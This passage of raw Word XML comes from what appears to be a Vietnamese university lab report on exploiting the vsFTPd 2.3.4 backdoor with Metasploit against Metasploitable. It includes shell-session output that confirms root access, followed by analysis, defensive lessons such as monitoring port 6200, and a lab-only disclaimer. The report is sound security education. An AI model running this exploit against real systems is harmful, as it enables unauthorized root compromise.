          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">:41293 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>target ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:6200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583B3C6" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.6. Xác nhận leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489467C1" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi session shell được mở, thực hiện lệnh ls để liệt kê t</w:t>
      </w:r>
      <w:r>
        <w:t>hư mục gốc và xác nhận quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D3321" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bin  boot  cdrom  dev  etc  home  initrd  lib  lost+found  media  mnt  opt  proc  root  sbin  srv  sys  tmp  usr  var  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F2E91" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thông tin UID = 0 (root) và GID = 0 (root) cùng với việc liệt kê được toàn bộ hệ thống tệp tin chứ</w:t>
      </w:r>
      <w:r>
        <w:t>ng tỏ đã chiếm được quyền điều khiển cao nhất trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A1F49" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. PHÂN TÍCH KẾT QUẢ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFEF49D" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Quá trình thực nghiệm đã chứng minh rằng lỗ hổng backdoor trong vsFTPd 2.3.4 có thể bị khai thác một cách dễ dàng và nhanh chóng. Chỉ với một số lệnh đơn giản trong Metasploit, kẻ tấn công đã thu được shell với quyền root thông qua cổng 6200 mà backdoor mở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB06D3" w14:textId="23934234" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Banner “220 (vsFTPd 2.3.4)” xác nhận đúng phiên bản có lỗ hổng. Việc nhận được “UID: uid=0(root) gid=0(root)” cho thấy không chỉ chiếm được quyền truy cập mà còn leo thang đặc quyền lên mức cao nhất của hệ thống. Session shell được mở từ địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:t>[source ip]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đến </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:t>:6200 khẳng định kết nối ngược thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4193B0" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đặc điểm của tấn công zero-day/backdoor là hầu như không có hệ thống phòng thủ sẵn có để ngăn chặn ngay lập tức. Khi lỗ hổng chưa được phát hiện và vá, hệ thống hoàn toàn lộ diện trước </w:t>
      </w:r>
      <w:r>
        <w:t>cuộc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB81E8" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. BIỆN PHÁP PHÒNG THỦ VÀ BÀI HỌC KINH NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A437940" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Khi một cuộc tấn công zero-day xảy ra, hệ thống thường không có cơ hội đáp trả kịp thời. Tuy nhiên, mọi hành động trên hệ thống đều để lại dấu vết trong log. Do đó, việc theo dõi, truy vết log và</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phát hiện backdoor là rất quan trọng. Nếu nguồn lực cho phép, có thể theo dõi kẻ tấn công để thu thập thông tin; nếu không, cần nhanh chóng loại bỏ quyền truy cập bất hợp pháp, vá lỗ hổng và kiểm tra toàn bộ hệ thống để loại bỏ backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F492A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Một số biện pháp </w:t>
      </w:r>
      <w:r>
        <w:t>phòng thủ và bài học rút ra từ thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6C3F2" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Luôn cập nhật phần mềm và áp dụng các bản vá bảo mật kịp thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC80623" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện kiểm thử xâm nhập (penetration testing) định kỳ trên hệ thống của chính mình – “tấn công để phòng thủ”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA043C8" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Giám sát log hệ thống và các kết nố</w:t>
      </w:r>
      <w:r>
        <w:t>i bất thường (đặc biệt các cổng không chuẩn như 6200).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68552C0A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hạn chế dịch vụ không cần thiết; chỉ mở các cổng thật sự cần dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26877A6A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Nâng cao kiến thức về hệ điều hành, mạng máy tính, lập trình và phân tích hệ thống để phát hiện và khắc phục lỗ hổng sớm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FF4DF" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Như Kevin Mi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tnick từng nói: “Bạn có thể chạy nhưng không thể trốn” – mọi hành động trên hệ thống đều được ghi lại. Nghệ thuật phòng thủ nằm ở khả năng phát hiện, truy vết và phản ứng nhanh chóng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011E9FB" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49E2ED" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thực nghiệm đã thành công trong việc khai thác lỗ hổng backd</w:t>
      </w:r>
      <w:r>
        <w:t>oor vsFTPd 2.3.4 trên Metasploitable, thu được shell với quyền root. Kết quả khẳng định mức độ nghiêm trọng của lỗ hổng zero-day/backdoor: dễ bị tấn công một khi đã được phát hiện, nhưng rất khó phòng thủ nếu chưa có bản vá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F938667" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Quá trình thực hiện cũng cho th</w:t>
      </w:r>
      <w:r>
        <w:t>ấy giai đoạn phức tạp và đòi hỏi kiến thức sâu rộng nhất chính là phát hiện lỗ hổng và vượt qua các lớp bảo vệ (firewall, proxy…). Việc nghiên cứu và thực hành tấn công có kiểm soát là cách hiệu quả để nâng cao năng lực Red Team cũng như xây dựng chiến lượ</w:t>
      </w:r>
      <w:r>
        <w:t>c phòng thủ chủ động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997D88A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo này chỉ mang tính chất học thuật và thực nghiệm trong môi trường lab cách ly. Mọi hành vi tấn công hệ thống thật mà không được phép đều là hành vi bất hợp pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415AE5AC" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5587CC4B" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Website Whitehat.vn – Cộng đồng an ninh mạng Việt Nam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B52D8A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Website AnonyViet.com – Tài liệu kỹ thuật và bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0EE3C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework Documentation – Rapid7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E04B3E" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap Network Scanning Documentation – nmap.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B33C06" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427559F7" w14:textId="75D1DF5F" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D2454F">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8931B" w14:textId="77777777" w:rsidR="004C5DC3" w:rsidRDefault="004C5DC3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50DAB8B6" w14:textId="77777777" w:rsidR="004C5DC3" w:rsidRDefault="004C5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084B2" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">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ED2831">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ED283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1A915" w14:textId="77777777" w:rsidR="004C5DC3" w:rsidRDefault="004C5DC3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="36931F24" w14:textId="77777777" w:rsidR="004C5DC3" w:rsidRDefault="004C5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4820" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="999999"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Trường Đại học Công nghệ Giao thông Vận tải –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33386"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C54A31FC"/>
    <w:lvl w:ilvl="0" w:tplc="D6AAE8AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="65EEEEE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="475E3198">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2054C2AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DBCE29FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4FF6E7F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D9E6E022">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="063EF028">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CE762144">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D033990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04161738"/>
    <w:lvl w:ilvl="0" w:tplc="1C3471B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D57800A8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9BB61E26">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E7ECF352">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="34703D9C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="190C5D32">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B48CD8DA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BE6233C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D95090BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35541C40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1D8905A"/>
    <w:lvl w:ilvl="0" w:tplc="39781820">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="055843AE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FA1A4A7C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0CE05E80">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D0C0D9BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="42D2D152">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BC745DB8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EF726BDE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="96082E28">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42F14C0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B75E27BE"/>
    <w:lvl w:ilvl="0" w:tplc="15945222">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="729E8654">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="ED7E883A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AE1E2E06">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EBE68738">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0A7C976A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="35F09D2A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DF5C7D8E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="34A4D4D8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="54DF32F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F9ECD3E"/>
    <w:lvl w:ilvl="0" w:tplc="7D280466">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0BA047C6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EFA2DFF4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0F1A93E6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7CB47260">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4BAC573C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="06DC738A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DD6E5A04">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AE301934">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F5F7F6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="178A81A4"/>
    <w:lvl w:ilvl="0" w:tplc="F64093E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D16EF3E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BF7EBB72">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B8A40EF2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A7E8F64E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="96CEFE5E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EAB4A19A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="139219AC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="54489D92">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C406AFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F5C8A52"/>
    <w:lvl w:ilvl="0" w:tplc="F4BEE25E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCAC86AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B158E998">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0428DD9C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4BBCD7DC">
